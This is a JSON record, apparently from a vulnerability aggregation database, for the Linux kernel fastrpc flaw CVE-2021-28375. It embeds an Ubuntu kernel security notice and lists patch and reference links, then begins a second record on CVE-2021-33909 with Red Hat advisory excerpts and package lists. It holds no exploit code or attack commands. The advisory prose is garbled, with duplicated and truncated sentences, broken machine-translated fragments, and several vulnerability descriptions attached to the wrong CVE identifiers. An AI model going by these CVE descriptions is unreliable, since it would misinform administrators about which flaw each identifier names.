        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in the Linux kernel through 5.11.6. fastrpc_internal_invoke in drivers/misc/fastrpc.c does not prevent user applications from sending kernel RPC messages, aka CID-20c40794eb85. This is a related issue to CVE-2019-2308. Vendor is responsible for this vulnerability CID-20c40794eb85 It is published as. This vulnerability is CVE-2019-2308 Vulnerabilities related to.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. This update provides the corresponding\nLinux kernel updates targeted specifically for Raspberry Pi devices\nin those same Ubuntu Releases. ==========================================================================\nUbuntu Security Notice USN-4949-1\nMay 11, 2021\n\nlinux, linux-aws, linux-azure, linux-gcp, linux-hwe-5.8, linux-kvm,\nlinux-oracle, linux-raspi vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.10\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A local attacker could use this to cause a\ndenial of service (system crash) or execute arbitrary code. (CVE-2021-3489)\n\nManfred Paul discovered that the eBPF implementation in the Linux kernel\ndid not properly track bounds on bitwise operations. A local attacker could\nuse this to cause a denial of service (system crash) or execute arbitrary\ncode. A local attacker could use this to cause a denial of service\n(system crash) or execute arbitrary code. (CVE-2021-3491)\n\nIt was discovered that the Nouveau GPU driver in the Linux kernel did not\nproperly handle error conditions in some situations. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2020-25639)\n\nOlivier Benjamin, Norbert Manthey, Martin Mazein, and Jan H. Sch\\xf6nherr\ndiscovered that the Xen paravirtualization backend in the Linux kernel did\nnot properly propagate errors to frontend drivers in some situations. An\nattacker in a guest VM could possibly use this to cause a denial of service\n(host domain crash). (CVE-2021-26930)\n\nJan Beulich discovered that multiple Xen backends in the Linux kernel did\nnot properly handle certain error conditions under paravirtualization. An\nattacker in a guest VM could possibly use this to cause a denial of service\n(host domain crash). A local\nattacker could possibly use this to gain elevated privileges. \n(CVE-2021-28375)\n\nIt was discovered that the Freescale Gianfar Ethernet driver for the Linux\nkernel did not properly handle receive queue overrun when jumbo frames were\nenabled in some situations. An attacker could use this to cause a denial of\nservice (system crash). (CVE-2021-29264)\n\nIt was discovered that the USB/IP driver in the Linux kernel contained race\nconditions during the update of local and shared status. An attacker could\nuse this to cause a denial of service (system crash). An attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2021-29266)\n\nIt was discovered that the TIPC protocol implementation in the Linux kernel\ndid not properly validate passed encryption key sizes. A local attacker\ncould use this to cause a denial of service (system crash). A local attacker could use this\nto cause a denial of service (system crash). (CVE-2021-29650)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.10:\n  linux-image-5.8.0-1024-raspi    5.8.0-1024.27\n  linux-image-5.8.0-1024-raspi-nolpae  5.8.0-1024.27\n  linux-image-5.8.0-1027-kvm      5.8.0-1027.29\n  linux-image-5.8.0-1029-oracle   5.8.0-1029.30\n  linux-image-5.8.0-1031-gcp      5.8.0-1031.32\n  linux-image-5.8.0-1032-azure    5.8.0-1032.34\n  linux-image-5.8.0-1033-aws      5.8.0-1033.35\n  linux-image-5.8.0-53-generic    5.8.0-53.60\n  linux-image-5.8.0-53-generic-64k  5.8.0-53.60\n  linux-image-5.8.0-53-generic-lpae  5.8.0-53.60\n  linux-image-5.8.0-53-lowlatency  5.8.0-53.60\n  linux-image-aws                 5.8.0.1033.35\n  linux-image-azure               5.8.0.1032.32\n  linux-image-gcp                 5.8.0.1031.31\n  linux-image-generic             5.8.0.53.58\n  linux-image-generic-64k         5.8.0.53.58\n  linux-image-generic-lpae        5.8.0.53.58\n  linux-image-gke                 5.8.0.1031.31\n  linux-image-kvm                 5.8.0.1027.29\n  linux-image-lowlatency          5.8.0.53.58\n  linux-image-oem-20.04           5.8.0.53.58\n  linux-image-oracle              5.8.0.1029.28\n  linux-image-raspi               5.8.0.1024.27\n  linux-image-raspi-nolpae        5.8.0.1024.27\n  linux-image-virtual             5.8.0.53.58\n\nUbuntu 20.04 LTS:\n  linux-image-5.8.0-53-generic    5.8.0-53.60~20.04.1\n  linux-image-5.8.0-53-generic-64k  5.8.0-53.60~20.04.1\n  linux-image-5.8.0-53-generic-lpae  5.8.0-53.60~20.04.1\n  linux-image-5.8.0-53-lowlatency  5.8.0-53.60~20.04.1\n  linux-image-generic-64k-hwe-20.04  5.8.0.53.60~20.04.37\n  linux-image-generic-hwe-20.04   5.8.0.53.60~20.04.37\n  linux-image-generic-lpae-hwe-20.04  5.8.0.53.60~20.04.37\n  linux-image-lowlatency-hwe-20.04  5.8.0.53.60~20.04.37\n  linux-image-virtual-hwe-20.04   5.8.0.53.60~20.04.37\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4949-1\n  CVE-2020-25639, CVE-2021-26930, CVE-2021-26931, CVE-2021-28375,\n  CVE-2021-29264, CVE-2021-29265, CVE-2021-29266, CVE-2021-29646,\n  CVE-2021-29650, CVE-2021-3489, CVE-2021-3490, CVE-2021-3491\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/5.8.0-53.60\n  https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1033.35\n  https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1032.34\n  https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1031.32\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1027.29\n  https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1029.30\n  https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1024.27\n  https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-53.60~20.04.1\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28375"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "db": "VULHUB",
        "id": "VHN-387803"
      },
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "PACKETSTORM",
        "id": "162543"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-28375",
        "trust": 3.0
      },
      {
        "db": "PACKETSTORM",
        "id": "162167",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162695",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162541",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1231",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1307",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1299",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1623",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2606",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1766",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1694",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162550",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162543",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-387803",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387803"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "PACKETSTORM",
        "id": "162543"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28375"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ]
  },
  "id": "VAR-202103-1442",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387803"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:26:34.961000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "restrict\u00a0user\u00a0apps\u00a0from\u00a0sending\u00a0kernel\u00a0RPC\u00a0messages",
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/omrqvotasd3vzp6ge4jjhe27qu6fhtz6/"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=144241"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-862",
        "trust": 1.1
      },
      {
        "problemtype": "Improper authority management (CWE-269) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387803"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28375"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28375"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210401-0003/"
      },
      {
        "trust": 1.7,
        "url": "https://git.kernel.org/linus/20c40794eb85ea29852d7bc37c55713802a543d6"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/omrqvotasd3vzp6ge4jjhe27qu6fhtz6/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/tjpvqzpy3dhpv5i3ivnmsmo6d3pkzisx/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/xaunydtge6mb4nwl2sihpcodclet3jzb/"
      },
      {
        "trust": 1.0,
        "url": "https://lore.kernel.org/stable/yd03ew7+6v0xph6l%40kroah.com/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/xaunydtge6mb4nwl2sihpcodclet3jzb/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/omrqvotasd3vzp6ge4jjhe27qu6fhtz6/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/tjpvqzpy3dhpv5i3ivnmsmo6d3pkzisx/"
      },
      {
        "trust": 0.7,
        "url": "https://lore.kernel.org/stable/yd03ew7+6v0xph6l@kroah.com/"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2021-08-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1623"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1766"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162167/ubuntu-security-notice-usn-4911-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2606"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1307"
      },
      {
        "trust": 0.6,
        "url": "https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202110-0000001162680040"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-28375"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1231"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162695/ubuntu-security-notice-usn-4945-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-privilege-escalation-via-fastrpc-internal-invoke-34854"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1299"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1694"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162541/ubuntu-security-notice-usn-4945-1.html"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25639"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28038"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29265"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-4945-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29646"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4911-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1021.22"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1035.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1035.38~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4945-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1047.49~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1043.45"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1047.49"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1043.46~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1015.16~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1044.47~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1043.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1048.50~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-73.82"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1039.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-73.82~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1045.49"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1043.45~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1048.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1029.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1024.27"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26930"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4949-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1027.29"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-53.60~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29266"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3489"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-53.60"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26931"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1031.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1032.34"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29264"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3490"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1033.35"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3491"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35519"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4947-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1056.60"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387803"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "PACKETSTORM",
        "id": "162543"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28375"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-387803"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "PACKETSTORM",
        "id": "162543"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28375"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-03-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-387803"
      },
      {
        "date": "2021-11-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "date": "2021-04-13T22:55:55",
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "date": "2021-05-19T14:19:27",
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "date": "2021-05-12T13:50:45",
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "date": "2021-05-12T13:52:46",
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "date": "2021-05-12T13:51:05",
        "db": "PACKETSTORM",
        "id": "162543"
      },
      {
        "date": "2021-03-15T05:15:13.740000",
        "db": "NVD",
        "id": "CVE-2021-28375"
      },
      {
        "date": "2021-03-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-387803"
      },
      {
        "date": "2021-11-22T08:57:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      },
      {
        "date": "2023-11-07T03:32:08.597000",
        "db": "NVD",
        "id": "CVE-2021-28375"
      },
      {
        "date": "2022-07-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "PACKETSTORM",
        "id": "162543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Vulnerability in privilege management",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-004458"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-961"
      }
    ],
    "trust": 0.6
  }
}

var-202107-1361
Vulnerability from variot

fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. 8.1) - ppc64le, x86_64

  1. Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7.7) - ppc64, ppc64le, x86_64

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Bug Fix(es):

  • [RHEL7.9.z] n_tty_open: "BUG: unable to handle kernel paging request" (BZ#1872778)

  • [ESXi][RHEL7.8]"qp_alloc_hypercall result = -20" / "Could not attach to queue pair with -20" with vSphere Fault Tolerance enabled (BZ#1892237)

  • [RHEL7.9][s390x][Regression] Sino Nomine swapgen IBM z/VM emulated DASD with DIAG driver returns EOPNOTSUPP (BZ#1910395)

  • False-positive hard lockup detected while processing the thread state information (SysRq-T) (BZ#1912221)

  • RHEL7.9 zstream - s390x LPAR with NVMe SSD will panic when it has 32 or more IFL (pci) (BZ#1917943)

  • The NMI watchdog detected a hard lockup while printing RCU CPU stall warning messages to the serial console (BZ#1924688)

  • nvme hangs when trying to allocate reserved tag (BZ#1926825)

  • [REGRESSION] "call into AER handling regardless of severity" triggers do_recovery() unnecessarily on correctable PCIe errors (BZ#1933663)

  • Module nvme_core: A double free of the kmalloc-512 cache between nvme_trans_log_temperature() and nvme_get_log_page(). (BZ#1946793)

  • sctp - SCTP_CMD_TIMER_START queues active timer kernel BUG at kernel/timer.c:1000! (BZ#1953052)

  • [Hyper-V][RHEL-7]When CONFIG_NET_POLL_CONTROLLER is set, mainline commit 2a7f8c3b1d3fee is needed (BZ#1953075)

  • Kernel panic at cgroup_is_descendant (BZ#1957719)

  • [Hyper-V][RHEL-7]Commits To Fix Kdump Failures (BZ#1957803)

  • IGMPv2 JOIN packets incorrectly routed to loopback (BZ#1958339)

  • [CKI kernel builds]: x86 binaries in non-x86 kernel rpms breaks systemtap [7.9.z] (BZ#1960193)

  • mlx4: Fix memory allocation in mlx4_buddy_init needed (BZ#1962406)

  • incorrect assertion on pi_state->pi_mutex.wait_lock from pi_state_update_owner() (BZ#1965495)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):

1824792 - CVE-2020-11668 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c 1902788 - CVE-2019-20934 kernel: use-after-free in show_numa_stats function 1961300 - CVE-2021-33033 kernel: use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c 1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan 1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.36.2.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.36.2.el7.x86_64.rpm kernel-devel-3.10.0-1160.36.2.el7.x86_64.rpm kernel-headers-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.36.2.el7.x86_64.rpm perf-3.10.0-1160.36.2.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-3.10.0-1160.36.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.36.2.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

Source: kernel-3.10.0-1160.36.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.36.2.el7.noarch.rpm kernel-doc-3.10.0-1160.36.2.el7.noarch.rpm

